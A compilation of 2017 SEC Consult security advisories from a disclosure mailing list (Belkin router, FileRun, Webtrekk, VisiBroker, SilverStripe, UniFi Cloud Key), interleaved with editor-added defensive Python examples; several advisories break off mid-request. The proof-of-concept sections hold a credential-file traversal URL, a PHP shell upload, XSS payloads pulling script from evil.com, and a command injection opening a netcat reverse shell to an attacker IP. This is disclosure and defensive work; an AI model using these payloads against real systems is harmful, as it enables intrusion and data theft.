"Today, Belkin International has three brands – Belkin, Linksys and WeMo
– to enhance the technology that connects us to the people, activities
and experiences we love. Belkin products are renowned for their
simplicity and ease of use, while our Linksys brand helped make
wireless connectivity mainstream around the globe. Our newest brand,
WeMo, is the leader in delivering customizable smart home experiences.
Its product platform empowers people to monitor, measure and manage
their electronics, appliances and lighting at home and on-the-go."

Source: http://www.belkin.com/uk/aboutUs/


Business recommendation:

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.


Vulnerability overview/description:
---
1) Denial of Service (DoS)
A denial of service vulnerability is present in the web server of the
device. This vulnerability is very simple to trigger since a single GET
request to a cgi-script is sufficient.

A crafted GET request, e.g. triggered via CSRF through a user in the internal
network, can reboot the whole device or freeze the web interface and the DHCP
service. This action does not require authentication.

2) HTTP Header Injection & Open Redirect
Due to a flaw in the web service, a header injection can be triggered
without authentication. This kind of vulnerability can be used to perform
different arbitrary actions; one example in this case is an open redirect
to another web site. In the worst case the session ID of an authenticated user
can be stolen this way, because the session ID is embedded in the URL,
which is another flaw of the web service.

3) Improper Session Protection
The session ID for administrative users can be fetched from the device from
LAN without credentials because of insecure session handling.
This vulnerability can only be exploited when an administrator was
authenticated to the device before the attack and opened a session previously.

The login works if the attacker has the same IP address as the PC
of the legitimate administrator. Therefore, a CSRF attack is possible when
the administrator is lured to surf on a malicious web site or to click on
a malicious link.

4) Cross-Site Request Forgery Vulnerability in Admin Interface
A cross-site request forgery vulnerability can be triggered in the
administrative interface. This vulnerability can be exploited because the
session ID can be hijacked by using 3) via LAN. Exploitation via the internet
is only possible if the session ID is exposed to the internet (for example via
the Referer header).

An attacker can change any configuration of the device by luring a user to
click on a malicious link or surf to a malicious web-site.

5) Cross-Site Scripting Vulnerability in Admin Interface
A cross-site scripting vulnerability can be triggered in the administrative
interface. This vulnerability can be exploited because the session ID can
be hijacked by using 3) via LAN. Exploitation via the internet is only possible
if the session ID is exposed to the internet (for example via the Referer header).

By using this vulnerability, malicious code can be executed in the context of
the browser session of the attacked user.


Proof of concept:
-
1) Denial of Service

Unauthenticated request for triggering a router reboot in browser:
http:///upgrade.cgi
http:///restore.cgi

Unauthenticated request for triggering a router freeze in browser:
http:///mfgtst.cgi


2) HTTP Header Injection & Open Redirect

A header injection can be triggered by the following unauthenticated request:

Request:
--
POST /UnsecuredEnable.cgi HTTP/1.1
Host: 
Accept: */*
Accept-Language: en
Connection: close
Referer: http:///Unsecured.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

[FD] SEC Consult SA-20171018-0 :: Multiple vulnerabilities in Afian AB FileRun

2017-10-18 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171018-0 >
===
  title: Multiple vulnerabilities
product: Afian AB FileRun
 vulnerable version: 2017.03.18
  fixed version: 2017.09.18
 impact: critical
   homepage: https://www.filerun.com | https://afian.se
  found: 2017-08-28
 by: Roman Ferdigg (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"FileRun File Manager: access your files anywhere through self-hosted
secure cloud storage, file backup and sharing for your photos, videos,
files and more. Upload and download large files for easy sharing. Google
Drive self-hosted alternative."

Source: https://www.filerun.com


Business recommendation:

By exploiting the vulnerabilities documented in this advisory, an attacker
can compromise the web server which has FileRun installed. User files might
get exposed through this attack.

SEC Consult recommends not to use FileRun until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.


Vulnerability overview/description:
---
1) Path Manipulation
When uploading, downloading or viewing files, FileRun uses a parameter to
specify the path on the file-system. An attacker can manipulate the value
of this parameter to read, create and even overwrite files in certain
folders. An attacker could upload malicious files to compromise the
webserver. In combination with the open redirect and CSRF vulnerability
even an unauthenticated attacker can upload these files to get a shell.
Through the shell all user files can be accessed.


2) Stored Cross Site Scripting (XSS) via File Upload
The application allows users to upload different file types. It is also
possible to upload HTML files or to create them via the application's text
editor. Files can be shared using a link or within the FileRun application
(in the enterprise version). An attacker can inject JavaScript in HTML
files to attack other users or simply create a phishing site to steal user
credentials.

Remark:
In the standard configuration of the FileRun Docker image the HttpOnly
cookie flag is not set, which means that authentication cookies can be
accessed in an XSS attack. This allows easy session hijacking as well.


3) Cross Site Request Forgery (CSRF)
The application does not implement CSRF protection. An attacker can exploit
this vulnerability to execute arbitrary requests with the privileges of the
victim. The only requirement is that a victim visits a malicious webpage.
Such a page could be hosted on the FileRun server itself and shared with
other users as described in vulnerability 2.
Besides others, the following actions can be performed via CSRF if the
victim has administrative privileges:
 - Create or delete users
 - Change permissions rights of users
 - Change user passwords

If the victim has no administrative privileges, for example the following
actions can be performed:
 - Upload files
 - Change the email address (for password recovery)


4) Open Redirect Vulnerabilities
An open redirect vulnerability in the login and logout pages allows an
attacker to redirect users to arbitrary web sites. The redirection host
could be used for phishing attacks (e.g. to steal user credentials) or for
running browser exploits to infect a victim's machine with malware. The open
redirect in the login page could also be used to exploit CSRF (see above).
Because the server name in the manipulated link is identical to the
original site, phishing attempts may have a more trustworthy appearance.


Proof of concept:
-
1) Path Manipulation
The URL below is used to read the application file "autoconfig.php", which
contains the username and cleartext password of the database.

URL:
http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php


This post request is used to upload a PHP shell in the writable folder
avatars:

POST /?module=fileman_myfiles&section=ajax&page=up HTTP/1.1
Host: $DOMAIN
[...]
Content-Type: multipart/form-data; boundary=---293712729522107
Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english
DNT: 1
Connection: close

-293712729522107
Content-Disposition: form-data; name="flowTotalSize"

150
-293712729522107
Content-Disposition: form-data; name="fl
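
Worked example (added by the editor; not FileRun's code): the path confinement
check that the "path" parameter above lacks. The base directory
/srv/filerun/users/alice and the sample paths are assumptions made for the
demonstration; the check itself is the general one for any user-supplied path.

```python
import posixpath


def resolve_user_path(base_dir, user_path):
    """Map a client-supplied `user_path` to a location inside `base_dir`, or
    raise ValueError if it would point anywhere else. Pure string logic
    (posixpath), so it runs without a filesystem; on a live server additionally
    compare os.path.realpath() of the result with the realpath of base_dir so
    that symlinks cannot lead outside either."""
    base = posixpath.normpath(base_dir)
    if not base.startswith("/"):
        raise ValueError("base_dir must be absolute")
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    if user_path.startswith("/"):
        # An absolute value is exactly the advisory's attack (path=/var/www/...):
        # posixpath.join() would discard base_dir for it, so refuse it outright
        # instead of silently relocating it below base_dir.
        raise ValueError("absolute paths are not accepted")
    # normpath() collapses "..", ".", and duplicate slashes; the prefix test
    # afterwards is what catches "../" sequences that climbed above base_dir.
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    prefix = base.rstrip("/") + "/"
    if candidate != base and not candidate.startswith(prefix):
        raise ValueError("path escapes %s: %r" % (base, user_path))
    return candidate


if __name__ == "__main__":
    base = "/srv/filerun/users/alice"
    for p in ["photos/a.jpg", "../../etc/passwd",
              "/var/www/html/system/data/autoconfig.php"]:
        try:
            print(p, "->", resolve_user_path(base, p))
        except ValueError as exc:
            print(p, "-> rejected:", exc)
```

The prefix comparison uses the normalised base with a trailing slash so that a
sibling directory such as /srv/filerun/users/alice2 is not accepted as being
"inside" /srv/filerun/users/alice.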

[FD] SEC Consult SA-20171017-0 :: Cross site scripting in Webtrekk Pixel tracking component

2017-10-17 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171017-0 >
===
  title: Cross site scripting
product: Webtrekk Pixel tracking
 vulnerable version: v3.24 to v3.40, v4.00 to v4.40, v5.00 to v5.04
  fixed version: v3.41, v4.41, v5.05
 impact: Medium
   homepage: https://www.webtrekk.com/
  found: 2017-08-29
 by: Malte Batram for
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Webtrekk Analytics offers an endless range of filter and analysis functions.
Whatever type of site you operate, our analytics tools give you the raw data
you need to dive into your web and app metrics so you can optimise your
digital marketing campaigns."

Source: https://www.webtrekk.com/en/solutions/analytics/

"At home in Germany, Webtrekk ranks first among professional analytics tools
used by the 1,000 most popular .de domains. All told, Webtrekk has a
22.9 percent market share among providers for the top German domains,
excluding sites that use Google Analytics or have no analytics system."

Source: https://www.webtrekk.com/en/why-webtrekk/market-leader/


Business recommendation:

The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Cross site scripting vulnerability
The Webtrekk Pixel component, used on many websites to track users, has the
capability to load arbitrary external JavaScript via multiple parameter
combinations. The parameters are parsed from the search-part of the URL.

?wt_overlay=1&wt_reporter=url_for_external_javascript
?wt_heatmap=1&wt_reporter=url_for_external_javascript

The URL specified in the parameter wt_reporter is checked by a Regex that can
be bypassed in different ways.


Proof of concept:
-
1) Cross site scripting vulnerability
Example URL:

http://www.example.com/?wt_overlay=1&wt_reporter=report1.webtrekk.com.evil.com/

The example URL leads to the inclusion of the following HTML in the page:
<script src="https://report1.webtrekk.com.evil.com/overlay.pl?wt_contentId=..."></script>

Regex that checks the URL:
/^(http[s]?:\/\/)?(report\d+|analytics)\.webtrekk\.(com|de).*$/

The .* at the end of the expression allows multiple bypasses:
 Subdomain: report1.webtrekk.com.evil.com/
 Auth:      report1.webtrekk@evil.com/
 NoSlash:   report1.webtrekk.com

The last bypass leads to the inclusion of JavaScript from the domain
overlay.pl: without the trailing slash, the "overlay.pl" that the script
appends becomes part of the host name (report1.webtrekk.comoverlay.pl). That
domain was open to be registered at the time of testing, but has since been
registered by Webtrekk for security reasons.

The vulnerability can also be triggered via cookies. This enables an attacker
to execute JavaScript in the session of the victim anytime the website with
the vulnerable script is visited, after only using the parameters from the
search once to set the cookie values.

Cookie values:
wt_overlay=1; wt_overlayFrame=report1.webtrekk.com.evil.com/;
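
Worked example (added for this page; not Webtrekk's code): the quoted pattern
reproduced with Python's re module, next to a validator that checks the parsed
hostname and rebuilds the script URL itself. The concatenation
"https://" + wt_reporter + "overlay.pl?..." is inferred from the HTML shown
above and the query string wt_contentId=demo is a placeholder. The Auth variant
is tried in the form report1.webtrekk.com@evil.com/, because the value as
printed in the list above (report1.webtrekk@evil.com/) lacks the ".com" the
pattern requires and is rejected by the regex as quoted; the example asserts
that as well.

```python
import re
from urllib.parse import urlsplit

# The pattern quoted in the advisory, transcribed from JavaScript to a Python raw string.
VULNERABLE_RE = re.compile(r"^(http[s]?://)?(report\d+|analytics)\.webtrekk\.(com|de).*$")

# Exact host allow-list used by the hardened variant below (this example's policy).
ALLOWED_HOST_RE = re.compile(r"(report\d+|analytics)\.webtrekk\.(com|de)")


def vulnerable_overlay_url(wt_reporter):
    """What the vulnerable page did: accept the raw string if the regex matches,
    then embed it as 'https://' + value + 'overlay.pl?...'. Returns the URL the
    browser would fetch, or None if the regex rejected the value."""
    if not VULNERABLE_RE.match(wt_reporter):
        return None
    base = wt_reporter if wt_reporter.startswith(("http://", "https://")) else "https://" + wt_reporter
    return base + "overlay.pl?wt_contentId=demo"


def hardened_overlay_url(wt_reporter):
    """Validate the parsed hostname rather than the raw string, refuse userinfo
    and ports, and build the URL from the validated host so that no attacker
    controlled suffix reaches the page. Returns None for anything not allowed."""
    url = wt_reporter if wt_reporter.startswith(("http://", "https://")) else "https://" + wt_reporter
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port   # .port raises on a non-numeric port
    except ValueError:
        return None
    if not host or parts.username is not None or port is not None:
        return None
    if not ALLOWED_HOST_RE.fullmatch(host):
        return None
    return "https://%s/overlay.pl?wt_contentId=demo" % host


def loaded_from(url):
    """Host that actually serves the script for a given URL (None if rejected)."""
    return urlsplit(url).hostname if url else None


if __name__ == "__main__":
    for value in ["report1.webtrekk.com.evil.com/", "report1.webtrekk.com@evil.com/",
                  "report1.webtrekk.com", "https://analytics.webtrekk.de/"]:
        print("%-34s vulnerable -> %-32s hardened -> %s" % (
            value, loaded_from(vulnerable_overlay_url(value)), hardened_overlay_url(value)))
```

The point of the hardened variant is not a tighter regex but the order of
operations: parse first, validate the component that matters (the host), then
construct the URL from that component instead of echoing the input.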


Vulnerable / tested versions:
-
Latest version v4.3.9 tested:
https://support.webtrekk.com/hc/de/article_attachments/115005882469/Webtrekk_EN_Config_Pixel_v4.3.9.zip

Also found to be vulnerable: 3.2.6, 4.0.5, 4.3.5

The setup for version 5 is different and the static part (tiLoader.min.js)
does not include the vulnerable JavaScript directly. However, code similar to
the overlay functions from versions 3 and 4 seems to be loaded dynamically
(which also includes the same Regex check).

According to the vendor, v5 is affected as well.


Vendor contact timeline:

2017-08-30: Contacting vendor through a...@webtrekk.com & email under "Contact",
no answer
2017-09-12: Asking for contact again
2017-09-12: Vendor: requests sending the advisory and verifies it internally
2017-09-13: Vendor: optimized validation, fixed in internal version
2017-09-14: Release of patched version and vendor informs their customers
2017-10-17: Coordinated release of security advisory


Solution:
-
Upgrade to the patched versions from the vendor immediately. The following
versions contain better domain validation and fix the issue according to
the vendor:

v3.41, v4.41, v5.05

According to the vendor, the updated versions are available within the
support center on the vendor's website for all customers and a 

[FD] SEC Consult SA-20171016-0 :: Multiple vulnerabilities in Micro Focus VisiBroker C++

2017-10-15 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171016-0 >
===
  title: Multiple vulnerabilities
product: Micro Focus VisiBroker C++
 vulnerable version: 8.5 SP2
  fixed version: 8.5 SP4 HF3
 CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283
 impact: High
   homepage: https://www.microfocus.com/products/corba/visibroker/
  found: 2017-04
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying,
and managing distributed applications. Built on open industry standards and a
high-performance architecture, VisiBroker is especially suited to low-latency,
complex, data-oriented, transaction-intensive, mission-critical environments.
Using VisiBroker(R), organizations can develop, connect, and deploy complex
distributed applications that have to meet very high performance and reliability
standards. With more than 30 million licenses in use, VisiBroker is the world’s
most widely deployed CORBA Object Request Broker (ORB) infrastructure."

URL: https://www.microfocus.com/products/corba/visibroker/


Business recommendation:

During a superficial fuzzing test, SEC Consult found several memory corruption
vulnerabilities that allow denial of service attacks or potentially arbitrary
code execution. Although the fuzzing test only had a very limited coverage,
several vulnerabilities have been identified. Assuming the code quality is
homogeneous, it is possible that other parts of the application exhibit similar
issues.

SEC Consult did not attempt to fully evaluate the potential impact of the
identified vulnerabilities.

SEC Consult recommends to decommission any VisiBroker C++ component that
communicates with untrusted entities until a full security audit has been
performed. Moreover, SEC Consult recommends to restrict network access to all
CORBA services that utilize the VisiBroker C++ environment.


Vulnerability overview/description:
---
1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281]
By specifying a large value for a length field, an integer overflow occurs.
As a result, the application reads memory until a non-mapped memory region
is reached. This causes the application to encounter a segmentation fault.


2) Integer Overflow (Heap Overwrite) [CVE-2017-9282]
By specifying a manipulated value for a length field an attacker can cause an
integer overflow. This causes the application to allocate too little memory.
When the application attempts to write to this memory buffer, heap memory is
overwritten leading to denial of service or potentially arbitrary code
execution.


3) Out of Bounds Read [CVE-2017-9283]
By specifying a manipulated value for a length field, an attacker can cause
the application to read past an allocated memory region.


4) Use after Free
SEC Consult found that the application under certain circumstances tries to
access a memory region that has been deallocated before.

It is unclear whether Micro Focus fixed the root cause of this behaviour. As
the vendor was unable to reproduce the vulnerability in the current version,
Micro Focus believes that the vulnerability was fixed with a previous update.

Since SEC Consult is unsure whether Micro Focus found the root cause of the
vulnerability, we refrain from releasing proof of concept code.


Proof of concept:
-
A service implementing the following IDL was used to identify the
vulnerabilities listed here:

module Bank {
  interface Account {
float balance(in string test);
  };
  interface AccountManager {
Account open(in string name);
  };
};

The implemented service was based on the Visibroker example project
"bank_agent".


1) Integer Overflow / Out of Bounds Read (Denial of Service)
The method

CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put(
  CORBA_MarshalOutBuffer *this,
  const char *src,
  unsigned int size)

is used to copy/append a char[] into a buffer. If the size of the data that is
stored in the buffer plus the size of the char[] to be appended exceeds the
allocated size, the method reallocates the buffer. By choosing the
size of the char[] as e.g. 0x (on 32 bit systems) an integer overflow
can be caused. The method then continues without allocating additional memory.

However, the application then expects that the source buffer contains 0x
bytes o
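
Worked example (added here; a model of the arithmetic the advisory describes,
not VisiBroker code): the growth decision of put() with the addition wrapped to
32 bits, next to the overflow-safe comparison. The buffer sizes, the length
0xFFFFFFF8 and the short source message are values chosen for the
demonstration.

```python
MASK32 = 0xFFFFFFFF   # width of the length arithmetic on the 32-bit build


class MemoryFault(Exception):
    """Stands in for what the real process does: a segmentation fault or a
    silent out-of-bounds write."""


def grow_vulnerable(stored, size, capacity):
    """Growth decision as described: 'stored + size > capacity', with the sum
    computed in 32-bit unsigned arithmetic. A size close to 2**32 wraps the sum
    to a small number, so the buffer is not grown."""
    needed = (stored + size) & MASK32
    return needed if needed > capacity else capacity


def grow_safe(stored, size, capacity):
    """Same decision without forming a sum that can wrap: compare the declared
    size with the room that is left. stored never exceeds capacity, so the
    subtraction cannot underflow."""
    if size > capacity - stored:
        return stored + size   # Python ints do not wrap; C code must first
                               # reject size > SIZE_MAX - stored
    return capacity


def put(buf, capacity, src, size, grow=grow_vulnerable):
    """Append `size` bytes of `src` to `buf` (a bytearray). Returns the new
    capacity. Once the growth step has been skipped, the copy both reads `size`
    bytes from a source that is shorter and writes them past the buffer; both
    conditions are reported instead of being performed."""
    stored = len(buf)
    capacity = grow(stored, size, capacity)
    faults = []
    if stored + size > capacity:
        faults.append("writes %d bytes into a %d-byte buffer" % (stored + size, capacity))
    if size > len(src):
        faults.append("reads %d bytes from a %d-byte source" % (size, len(src)))
    if faults:
        raise MemoryFault("; ".join(faults))
    buf += src[:size]
    return capacity


def put_checked(buf, capacity, src, size):
    """The hardened append: refuse a declared length that the received message
    cannot back before any arithmetic, then grow with the safe comparison."""
    if size > len(src):
        raise ValueError("declared length %d exceeds the %d bytes received" % (size, len(src)))
    return put(buf, capacity, src, size, grow=grow_safe)


if __name__ == "__main__":
    for fn in (put, put_checked):
        try:
            fn(bytearray(b"A" * 16), 64, b"short message", 0xFFFFFFF8)
        except (MemoryFault, ValueError) as exc:
            print(fn.__name__, "->", type(exc).__name__, exc)
```

Checking the declared length against the bytes actually received is the check
that matters for a network-facing unmarshaller: the arithmetic fix alone would
still let a peer make the process read far beyond the message it sent.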

[FD] Internet Security Conference 2017 in China by 360 Qihoo

2017-09-17 Thread Vulnerability Lab
Internet Security Conference China (Asia) - 360 Qihoo

Event Url: http://isc.360.cn/2017/en/index.html

---

Speaker: Benjamin Kunz Mejri

Keynote:  People is the key factor of online security

Possibilities of Individuals & IT-Security - Security Researcher &
Bounty Hunter “No System is Safe!”

---

Speaker: Patrick Paumen

Keynote: Bio Hackers

---

References:

http://www.cctvplus.com/news/20170913/8060916.shtml#!language=1

http://science.china.com.cn/2017-09/14/content_40013916.htm

http://www.cfbond.com/zt/2017hlwdh/

https://news.cgtn.com/news/344e34557a6333566d54/share_p.html

http://www.chinanews.com/business/2017/09-12/8329096.shtml

http://www.yicai.com/image/5344069.html

http://www.csdn.net/article/a/2017-09-14/15932211

https://mp.weixin.qq.com/s/KVHGaQ54v6YkppN10l32sg




[FD] SEC Consult SA-20170914-1 :: Persistent Cross-Site Scripting in SilverStripe CMS

2017-09-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170914-1 >
===
  title: Persistent Cross-Site Scripting
product: SilverStripe CMS
 vulnerable version: <=3.5.3
  fixed version: 3.6.1
 impact: Medium
   homepage: https://www.silverstripe.org/
  found: 2017-03-15
 by: S. Tripathy (Office Singapore)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"SilverStripe is the intuitive content management system and flexible
framework loved by editors and developers alike. Equip your web teams
to achieve outstanding results."

Source: https://www.silverstripe.org/


Business recommendation:

SEC Consult recommends to do a proper output sanitization on uploaded
SVG files. Users should upgrade to version 3.6.1 or higher. A thorough
source code analysis is recommended.


Vulnerability overview/description:
---
1) Persistent Cross Site Scripting
Due to the lack of input validation and output sanitization,
an attacker can upload SVG files containing malicious JavaScript
code to be executed under a victim's browser context.


Proof of concept:
-
1) Persistent Cross Site Scripting
Example: XSS using SVG File Upload

The file upload function in the CMS allows uploading SVG files, but it does
not sanitize the file's output, which leads to XSS.

There are 2 vulnerable instances of the same vulnerability.
 1: The "Insert Media" option in the content editor.
 2: The path "/admin/assets/add/"

During editing contents or creating a new page an attacker can upload
an SVG image using the "Insert Image" button.

The request below shows that an attacker can upload an SVG file with
malicious payloads.
==
POST /admin/pages/edit/EditorToolbar/MediaForm/field/AssetUploadField/upload HTTP/1.1
Host: $host
   ---snip---
Cookie: PHPSESSID=esqs7da6338k0sgj7itn3tcil7; bypassStaticCache=1
Connection: close

-969190451574
Content-Disposition: form-data; name="SecurityID"

undefined
-969190451574
Content-Disposition: form-data; name="AssetUploadField"; 
filename="evilsvgfile.svg"
Content-Type: image/svg+xml


<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">
      alert('XSS!');
   </script>
</svg>

-969190451574--
==


Using the same process an attacker can also upload a malicious SVG file in the
path "/admin/assets/add/".


A low privilege editor user such as a "Content Editor" can also exploit this
vulnerability.
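
Worked example (added by the editor; not SilverStripe code): an upload-time
check for SVG files that flags the payload shape shown above together with the
other script-bearing constructs an SVG filter has to cover (event handler
attributes, javascript: hrefs, foreignObject and friends). The element and
attribute lists are this example's own policy, not the vendor's fix, and the
sample payload is constructed to match the advisory's alert('XSS!') file.

```python
import re
import xml.etree.ElementTree as ET

# Constructed payload with the same shape as the advisory's evilsvgfile.svg.
SAMPLE_PAYLOAD = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert('XSS!');</script>
</svg>"""

# This example's policy: elements that execute script or embed other content,
# compared by local name (namespace stripped, lower-cased).
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object",
                      "use", "animate", "set", "handler"}
SCRIPT_SCHEME = re.compile(r"^\s*(?:javascript|vbscript|data)\s*:", re.I)


def _local(name):
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def check_svg(data):
    """Return the list of reasons to reject the uploaded bytes `data` (an empty
    list means nothing was found). Entity declarations are refused before the
    parser sees them, because the stdlib parser expands internal entities; a
    DOCTYPE is reported but parsing continues, so the content is still checked."""
    findings = []
    if re.search(rb"<!ENTITY", data, re.I):
        return ["entity declaration"]
    if re.search(rb"<!DOCTYPE", data, re.I):
        findings.append("DOCTYPE declaration")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return findings + ["not well-formed XML: %s" % exc]
    if _local(root.tag) != "svg":
        findings.append("root element <%s> is not <svg>" % _local(root.tag))
    for el in root.iter():
        name = _local(el.tag)
        if name in FORBIDDEN_ELEMENTS:
            findings.append("forbidden element <%s>" % name)
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.startswith("on"):
                findings.append("event handler %s on <%s>" % (a, name))
            elif a == "href" and SCRIPT_SCHEME.match(value):
                scheme = value.split(":")[0].strip().lower()
                findings.append("%s href on <%s>" % (scheme, name))
    return findings


def is_safe_svg(data):
    return check_svg(data) == []


if __name__ == "__main__":
    for finding in check_svg(SAMPLE_PAYLOAD):
        print("rejected:", finding)
```

A check like this belongs next to the upload handler, but it does not replace
output-side measures: serving user uploads from a separate origin (or with
Content-Disposition: attachment and a restrictive Content-Security-Policy)
limits what a payload that slips through can reach.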


Vulnerable / tested versions:
-
The following version is affected by the identified vulnerabilities which
was the most recent version at the time of discovery:

Silverstripe CMS version <=3.5.3


Vendor contact timeline:

2017-03-22: Contacting vendor through secur...@silverstripe.org
2017-03-23: Vendor provided public key certificates
2017-03-23: Sent the advisory to vendor
2017-04-17: Follow-up with vendor on the status
2017-04-17: Vendor responded work in progress
2017-05-09: Follow-up with vendor on the status, no response from the vendor
2017-05-24: Informed the vendor on releasing the advisory
2017-05-31: Vendor states the vulnerability has been fixed; verification shows it is not
2017-06-07: Vendor confirmed that the issue is not fixed and it will be fixed in
the next release.
2017-06-27: Silverstripe Version 3.6.1 released
2017-09-14: Public release of advisory


Solution:
-
Upgrade to SilverStripe v3.6.1
https://www.silverstripe.org/download/

Changelog: https://docs.silverstripe.org/en/3/changelogs/3.6.1


Workaround:
---
Do not allow SVG file uploads.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the fi

[FD] SEC Consult SA-20170914-0 :: Authenticated Command Injection in Ubiquiti Networks UniFi Cloud Key

2017-09-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170914-0 >
===
  title: Authenticated Command Injection
product: Ubiquiti Networks UniFi Cloud Key
 vulnerable version: Firmware version <=0.6.4
  fixed version: Firmware version >=0.6.9
 CVE number: -
 impact: High
   homepage: https://www.ubnt.com
  found: 2017-03-26
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:

The patch supplied by the vendor should be installed immediately.

There are indications for further security issues within this device, hence
SEC Consult recommends performing a detailed review by security professionals.


Vulnerability overview/description:
---
1) Authenticated Command Injection in Administrative Interface
Changing the username with a hand-crafted request leads to command injection
in the administrative interface. This vulnerability can be exploited when the
Cloud Key web interface is exposed to the internet.

An attacker who can access the administrative web interface of the Cloud Key
after cracking a cloud account password is able to execute arbitrary commands
without access to the local network. Since the Ubiquiti switches also use the
same credentials, the whole network can be compromised over this attack vector.


Proof of concept:
-
1) Authenticated Command Injection in Administrative Interface
The following PHP code excerpt is responsible for the username command execution:

(api.inc, line 455)
---
[...]
function chusername($username) {
    exec(CMD_CHUSERNAME . ' ' . $username, $out, $rc);
    return $rc;
}
[...]
---

Since $username is neither validated nor escaped before being concatenated
into the shell command line, command injection is possible.

The following POST request opens a reverse-shell to the attacker:
---
POST /api/account HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
X-Access-Token: 
Referer: https://$host/manage/maintenance
Content-Length: 57
Cookie: CKSESSIONID=
Connection: close

{"username":";busybox nc $attackerIP 8999 -e /bin/bash;"}
---

Netcat was used as the listener:
$ nc -lvp 
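The root cause is the string concatenation into a shell command line with no validation of the value. The fix has two independent layers, and the block below, an added example rather than Ubiquiti's code, shows both in Python: the username is checked against an allowlist before it goes anywhere near a process, and it is then passed as a discrete argv element with no shell in between, so even a character the allowlist missed could not start a second command. CMD_CHUSERNAME is assumed to be a helper binary taking the new name as its first argument; its path here is a placeholder, not the real one.

```python
import json
import re
import subprocess

# Placeholder for the helper the PHP code invokes; the real path is not in the advisory.
CMD_CHUSERNAME = "/usr/local/bin/chusername"

# Allowlist for Unix login names: first character a lowercase letter or
# underscore, then letters, digits, underscore or hyphen, at most 32 in total.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def validate_username(username):
    """True only if the whole string matches the allowlist.

    fullmatch is deliberate: re.match with a trailing '$' would still accept
    "alice\\n; id", because '$' also matches just before a final newline.
    """
    return isinstance(username, str) and USERNAME_RE.fullmatch(username) is not None


def build_chusername_argv(username):
    """Return the argv list for the helper, or raise ValueError on bad input."""
    if not validate_username(username):
        raise ValueError("username contains characters outside the allowlist")
    # A list, not a string: subprocess passes each element as one argv entry
    # and never consults /bin/sh, so ';', '|' and '$(...)' carry no meaning.
    return [CMD_CHUSERNAME, username]


def parse_account_request(body):
    """Extract the username field from the JSON body of POST /api/account."""
    try:
        payload = json.loads(body)
    except ValueError:
        raise ValueError("body is not valid JSON")
    if not isinstance(payload, dict) or "username" not in payload:
        raise ValueError("missing username field")
    return payload["username"]


def chusername(username):
    """Run the helper without a shell and return its exit code, like the PHP function."""
    completed = subprocess.run(build_chusername_argv(username),
                               capture_output=True, check=False)
    return completed.returncode


if __name__ == "__main__":
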